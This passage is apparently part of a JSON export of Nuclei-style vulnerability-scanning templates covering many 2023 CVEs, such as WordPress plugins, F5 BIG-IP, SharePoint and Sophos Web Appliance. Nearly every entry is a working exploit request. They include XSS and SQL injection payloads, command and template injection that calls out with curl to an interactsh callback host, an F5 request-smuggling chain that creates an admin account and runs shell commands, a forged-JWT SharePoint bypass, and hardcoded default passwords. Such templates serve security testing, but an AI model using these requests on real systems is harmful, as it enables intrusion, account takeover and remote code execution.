\"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-5556","info":{"name":"Structurizr on-premises - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /signin HTTP/1.1\nHost: {{Hostname}}\n","POST /login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf={{csrf}}&hash=\n","GET /dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /workspace/create HTTP/1.1\nHost: {{Hostname}}\n","GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1\nHost: {{Hostname}}\n"],"attack":"pitchfork","payloads":{"username":["structurizr"],"password":["password"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<a href=\"/dashboard\">","Sign out"],"condition":"and"},{"type":"word","part":"body_5","words":["\");alert(document.domain);//","Structurizr"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"([0-9a-z-]+)\""],"internal":true},{"type":"regex","name":"workspace","group":1,"part":"header","regex":["\\/workspace\\/([0-9]+)\\?scriptNonce="],"internal":true}]}]},{"id":"CVE-2023-4111","info":{"name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id="],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"You have an error in your SQL syntax\", \"><script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-41763","info":{"name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Skype"]}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-6114","info":{"name":"Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/tmp/","{{BaseURL}}/wp-content/backups-dup-pro/tmp/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, '/tmp') && contains(body, '<title>Index of')"],"condition":"and"}]}]},{"id":"CVE-2023-2766","info":{"name":"Weaver OA 9.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header,\"text/plain\")","contains_all(body, \"sdbuser =\",\"sdbpassword =\")"],"condition":"and"}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-40504","info":{"name":"LG Simple Editor <= v3.21.0 - Command Injection","severity":"critical"},"requests":[{"raw":["GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"LG Simple Editor\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadVideo\"; filename=\"{{filename}}.bmp\"\n\n/\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadPath\"\n\n/\"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../\"\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_x\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_width\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_height\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"fail\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: application/json\n\n{\"command\":\"cp\",\"option\":\"-f\",\"srcPath\":\"/{{filename}}_original.bmp\",\"destPath\":\"/{{filename}}.jsp\"}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"data\",\"success\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /simpleeditor/{{filename}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-4114","info":{"name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Drinks & Extras\", \"Checkout\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4450","info":{"name":"JeecgBoot JimuReport - Template injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"sql\": \"<#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()>${ex(\\\"curl http://{{interactsh-url}}\\\")} \",\n  \"type\": \"0\"\n}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\") || contains(interactsh_protocol, \"dns\")","status_code == 200","contains(content_type,\"application/json\")","contains(body,\"success\")"],"condition":"and"}]}]},{"id":"CVE-2023-4451","info":{"name":"Cockpit - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Space :<img src=1 onerror=alert(document.domain)>: does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1263","info":{"name":"Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cmp_get_post_detail&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"img\":","\"date\":","\"title\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27032","info":{"name":"PrestaShop AdvancedPopupCreator - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /module/advancedpopupcreator/popup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\navailablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code == 200","contains(content_type, \"text/html\")","contains_all(body, 'popups','hasError')"],"condition":"and"}],"extractors":[{"type":"regex","name":"time","group":1,"regex":[",\"time\":([0-9]+),"],"internal":true},{"type":"regex","name":"token","group":1,"regex":[",\"static_token\":\"([0-9a-z]+)\","],"internal":true}]}]},{"id":"CVE-2023-3848","info":{"name":"MooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd\"><img%20src%3da%20onerror%3dalert(document.domain)>l43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-48023","info":{"name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2023-6379","info":{"name":"OpenCMS 14 & 15 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/tagebuch/eintraege/index.html?reloaded&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/list-editor/index.html?reloaded&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/compact/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/elaborate/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/masonry/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/blog/articles/index.html?reloaded&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1\"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1","/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>\" />","OpenCms"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-0900","info":{"name":"AP Pricing Tables Lite <= 1.1.6 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded\n\naction=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_3>=5","status_code_3 == 200","contains(body_3, \"Security check\")","contains(body_2, \"ap-pricing-tables-lite\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["_wpnonce=([0-9a-z]+)\">Log Out"],"internal":true}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-48241","info":{"name":"XWiki < 4.10.15 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+","{{BaseURL}}/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"reference\":","title_\":"],"condition":"or"},{"type":"dsl","dsl":["contains(body, \"services.localization.render\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-4415","info":{"name":"Ruijie RG-EW1200G Router Background - Login Bypass","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/login"],"body":"{\n  \"username\":\"2\",\n  \"password\":\"admin\",\n  \"timestamp\":1695218596000\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\"","\"msg\":\"\u767b\u5165\u6210\u529f\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46747","info":{"name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","severity":"critical"},"requests":[{"raw":["POST /tmui/login.jsp HTTP/1.1\nHost: {{Hostname}}\nTransfer-Encoding: chunked, chunked\nContent-Type: application/x-www-form-urlencoded\n\n204\n{{ hex_decode(concat(\"0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d\",username,\"266e616d655f6265666f72653d267061737377643d\",password,\"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00\")) }}\n0\n\n"],"unsafe":true},{"raw":["PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(hex_decode(username)+\":\"+hex_decode(password))}}\nContent-Type: application/json\n\n{\"password\": \"{{password2}}\"}\n\n","POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{hex_decode(username)}}\", \"password\":\"{{pass}}\"}\n\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n\n"],"payloads":{"pass":["{{password2}}","{{hex_decode(password)}}"]},"skip-variables-check":true,"stop-at-first-match":true,"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true},{"type":"regex","part":"body_3","group":1,"regex":["\"commandResult\":\"(.*)\""]},{"type":"dsl","dsl":["\"Username:\" + hex_decode(username)","\"Password:\" + pass","\"Token:\" + token"]}],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}]}]},{"id":"CVE-2023-45855","info":{"name":"qdPM 9.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uploads/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /uploads</title>","attachments/</a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5222","info":{"name":"Viessmann Vitogate 300 - Hardcoded Password","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-login\",\"params\":{\"uid\":\"{{username}}\",\"pwd\":\"{{password}}\"}}\n"],"attack":"pitchfork","payloads":{"username":["vitomaster","vitogate"],"password":["viessmann1917","viessmann"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["admin\":true","\"sessionId\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27639","info":{"name":"PrestaShop TshirteCommerce - Directory Traversal","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php","matchers-condition":"and","matchers":[{"type":"word","words":["SqlFormatter Examples","SqlFormatter","<?php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41538","info":{"name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"New Question\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-42442","info":{"name":"JumpServer > 3.6.4 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/terminal/sessions/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"terminal\":","\"user_id\":\"","\"account_id\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6380","info":{"name":"OpenCms 14 & 15 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-29357","info":{"name":"Microsoft SharePoint - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer\n","GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nAuthorization: Bearer {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\nX-PROOF_TOKEN: {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\n"],"extractors":[{"type":"regex","part":"header","group":1,"name":"realm","regex":["realm=\"([^\"]*)\""],"internal":true},{"type":"json","json":[".value[].Email"]}],"matchers":[{"type":"word","part":"body_2","words":["LoginName","Email","IsSiteAdmin"],"condition":"and"}]}]},{"id":"CVE-2023-34259","info":{"name":"Kyocera TASKalfa printer - Path 